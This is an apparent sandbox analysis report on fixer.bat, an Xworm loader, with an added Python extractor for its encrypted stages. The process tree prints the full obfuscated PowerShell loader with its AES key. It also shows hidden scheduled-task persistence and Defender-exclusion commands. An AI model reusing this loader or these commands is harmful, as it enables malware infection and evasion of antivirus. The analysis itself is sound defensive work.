Analysis Overview
SHA256
9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
Threat Level: Known bad
The file fixer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs net.exe
Delays execution with timeout.exe
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 08:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 08:22
Reported
2024-06-01 08:23
Platform
win10v2004-20240508-en
Max time kernel
37s
Max time network
38s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_9_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
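The cmd.exe entry above (`/S /D /c" echo function decrypt_function ...`) echoes the loader body into the hidden PowerShell that follows it. Read in order, the loader opens its own .bat with ReadAllText, takes the first line that begins with the 20-character marker `xHKZaTmGffiyfsNVmown`, strips the marker with Substring(20), splits the remainder on `\`, undoes a two-character base64 alphabet swap (`#` for `/`, `@` for `A`), AES-CBC-decrypts each chunk with the hard-coded key and IV (the key decodes to 32 bytes, so AES-256), gunzips it and hands the result to Assembly.Load, calling EntryPoint.Invoke on each. The method names are hidden as reversed strings: `'gnirtS46esaBmorF'[-1..-16]` is FromBase64String, `'txeTllAdaeR'[-1..-11]` is ReadAllText, `'daoL'[-1..-4]` is Load. Windows_Log_9.bat in the Files section carries the sample's own SHA256, so the persistence copy is byte-identical and the same extractor applies to both. The Python below is an added example, not part of this report or of the sample: it reimplements the pipeline so the embedded stages can be dumped offline without running the loader. The AES stage needs the `cryptography` package; the .bat that `build_sample_bat` produces for the self-test is constructed here in the same container format with the same key, it is not the real fixer.bat.

```python
"""Offline extractor for the fixer.bat / Windows_Log_*.bat loader container."""
import base64
import gzip
from typing import List, Optional

try:
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_CRYPTOGRAPHY = True
except ImportError:
    HAVE_CRYPTOGRAPHY = False

# Constants copied from the loader command line in the process tree above.
MARKER = "xHKZaTmGffiyfsNVmown"                                             # 20 chars; loader does Substring(20)
AES_KEY = base64.b64decode("VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE=")  # 32 bytes -> AES-256
AES_IV = base64.b64decode("D+0Hhw9QG/X6TQoVNa+B1g==")                        # 16 bytes, fixed IV


def unmangle_b64(chunk: str) -> bytes:
    """Undo the loader's alphabet swap ('#' stands for '/', '@' for 'A') and decode."""
    return base64.b64decode(chunk.replace("#", "/").replace("@", "A"))


def mangle_b64(data: bytes) -> str:
    """Inverse of unmangle_b64; only used to build the constructed sample below."""
    return base64.b64encode(data).decode("ascii").replace("/", "#").replace("A", "@")


def aes_cbc(blob: bytes, encrypt: bool = False) -> bytes:
    """AES-256-CBC with PKCS7 padding under the hard-coded key/IV (encrypt is for the sample only)."""
    if not HAVE_CRYPTOGRAPHY:
        raise RuntimeError("the AES stage needs the 'cryptography' package")
    cipher = Cipher(algorithms.AES(AES_KEY), modes.CBC(AES_IV))
    if encrypt:
        padder = padding.PKCS7(128).padder()
        enc = cipher.encryptor()
        return enc.update(padder.update(blob) + padder.finalize()) + enc.finalize()
    dec = cipher.decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(dec.update(blob) + dec.finalize()) + unpadder.finalize()


def find_payload_line(bat_text: str) -> Optional[str]:
    """Mirror the loader's scan: first line that starts with MARKER, marker stripped."""
    for line in bat_text.splitlines():
        if line.startswith(MARKER):
            return line[len(MARKER):]
    return None


def extract_payloads(bat_text: str) -> List[bytes]:
    """Return the decoded stages in the order the loader passes them to Assembly.Load."""
    tail = find_payload_line(bat_text)
    if tail is None:
        raise ValueError("marker line not found: different marker or not this loader")
    # Loader: $wrsGY.Split('\') gives one chunk per stage; then FromBase64String, AES, GZip.
    return [gzip.decompress(aes_cbc(unmangle_b64(chunk))) for chunk in tail.split("\\")]


def looks_like_pe(stage: bytes) -> bool:
    """Assembly.Load expects a PE image; a stage not starting with 'MZ' means wrong key or marker."""
    return stage[:2] == b"MZ"


def build_sample_bat(stages: List[bytes]) -> str:
    """Constructed sample in the same container format; NOT the real fixer.bat."""
    chunks = [mangle_b64(aes_cbc(gzip.compress(s), encrypt=True)) for s in stages]
    return "@echo off\r\n" + MARKER + "\\".join(chunks) + "\r\nexit /b\r\n"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                                   # python extract.py <loader.bat>
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:                                                   # no file given: self-test on fake stages
        text = build_sample_bat([b"MZ" + b"\x90" * 40 + b"stage1", b"MZ" + b"\x90" * 40 + b"stage2"])
    for i, stage in enumerate(extract_payloads(text), 1):
        print(f"stage{i}: {len(stage)} bytes, PE header={looks_like_pe(stage)}")
        with open(f"stage{i}.bin", "wb") as fh:
            fh.write(stage)
```

Point it at the captured .bat (the `extract.py` name is arbitrary) and feed the resulting `stage*.bin` files to a .NET disassembler. If a stage fails the `MZ` check, the key, IV or marker differ from this sample and the decoded bytes should not be trusted; the loader's static IV also means two builds with the same key and stage produce identical ciphertext, which is why the persistence copy hashes identically to the original.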
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
Files
memory/4548-0-0x00007FFA6C413000-0x00007FFA6C415000-memory.dmp
memory/4548-11-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
memory/4548-10-0x0000025DF7610000-0x0000025DF7632000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51143hyf.xux.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4548-12-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
memory/4548-13-0x0000025DF7A10000-0x0000025DF7A54000-memory.dmp
memory/4548-14-0x0000025DF7A60000-0x0000025DF7AD6000-memory.dmp
memory/4548-15-0x0000025DF54E0000-0x0000025DF54E8000-memory.dmp
memory/4548-16-0x0000025DF7600000-0x0000025DF7612000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3ffce848af907464c20a20e1b430f78a |
| SHA1 | fbcd91a5c226d474235be920cf49e3344893fc1f |
| SHA256 | 25213a6685a6fd21a2aa43c417891703333579ad784f3896976b44bcfcdb009e |
| SHA512 | 1adaf6d68441a32b459b6071dcfdae404ab1e37bb0c6511e08d49717f9043679bdd7ca3324be184ece522e6516eedc04203ffccb5f9ea790bd35a84db9b944bf |
C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs
| MD5 | a06f75c614ce265849e2dfa949e03993 |
| SHA1 | 72bf7a3ee49244d9ae4fbf92542aef881c83c630 |
| SHA256 | 09c05316992d7c9470baee97e2a90e7d6ba3f390646f610dd8409d499271d9c8 |
| SHA512 | d036970d3376a99c5c4302a8609ee37d7f5dd6e959b3abaa304e904af7a17e5b860678731aa0fd873e23ce8e55a36b876097bd59f32d66054a4d651f54209d41 |
C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat
| MD5 | 1e16a3b0237093cea53d9dff9593c17a |
| SHA1 | 4227feac46a1a00827029d784442ca250c3d27b1 |
| SHA256 | 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833 |
| SHA512 | 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 664dee2ab48c3453aa55cac8ecaa5a44 |
| SHA1 | 9211491fa3bfb05ded40ac728c73e05ac7e2aca2 |
| SHA256 | a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953 |
| SHA512 | dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff |
memory/3512-46-0x000002C9F4990000-0x000002C9F49A2000-memory.dmp
memory/3512-47-0x000002C9F4A10000-0x000002C9F4A26000-memory.dmp
memory/4548-48-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 00068d34580ca0b4e186c4a6f303b09e |
| SHA1 | 59fe7294b796d4848709b32042246f1bb73acfab |
| SHA256 | 68f5b87085e5d444e29c42f79d24740e03f6658edb8bd2230cce896aac871fa6 |
| SHA512 | 96359172ef18684d8b81977a3d79246427ce0b328e160f2e8b548b338feb081817293b04593960f679915c42a5b86255b30f5b56d06318de8dcb4e77e9d277ea |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f3bc9dee8a80a73a256a69e26fe61c07 |
| SHA1 | bc546c10ce1b4cb47b89ea60498384f88f96fa5a |
| SHA256 | 3c7f3194722f46cb07885da576daf720a5133913b3fbce4a3ef8c8040028364d |
| SHA512 | be2d861832db826ee67f03e6a9151dc6802481c3b5984ce457e43cebecd162f60460ccf7ac5893169d01eff77e2a863c5e323d68e07f2b1b3d6dab5884f7ac6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 170815947c2c60cbba6d92dbaa5fcda0 |
| SHA1 | ee35a1efbeefb6f4d02b5998ead396927b2b3c3e |
| SHA256 | c8b10f1af94f31c428461e0982d069316295482cc3642589f538ab5f163bbacb |
| SHA512 | b077a95d1fe0308903e0b690c08c96f205485c7f31f355d8e8f8b545f587538d618bdff2d5e93ae97491b2a14a4b9ef79f619c2acf067018567b5e8167727a83 |
C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat
| MD5 | d649dd1277ab7c2278808ce9aab3103e |
| SHA1 | b96c2425fb03c8fc44151f3ab0d0ae28a9d81029 |
| SHA256 | 9aa57a271ddad7106f6d49815e88700f69e69056329f65799e82d6ec41bc23f9 |
| SHA512 | f182e5d21fb679eb06db5eb7339c1ab8cc8ad4b7c495a6fba48e095b2d178d253278a13fd026a40146cad35b0c112e12afde614fff40c10fb0ce7296712d62ff |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 08:22
Reported
2024-06-01 08:23
Platform
win11-20240426-en
Max time kernel
37s
Max time network
38s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_583_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join 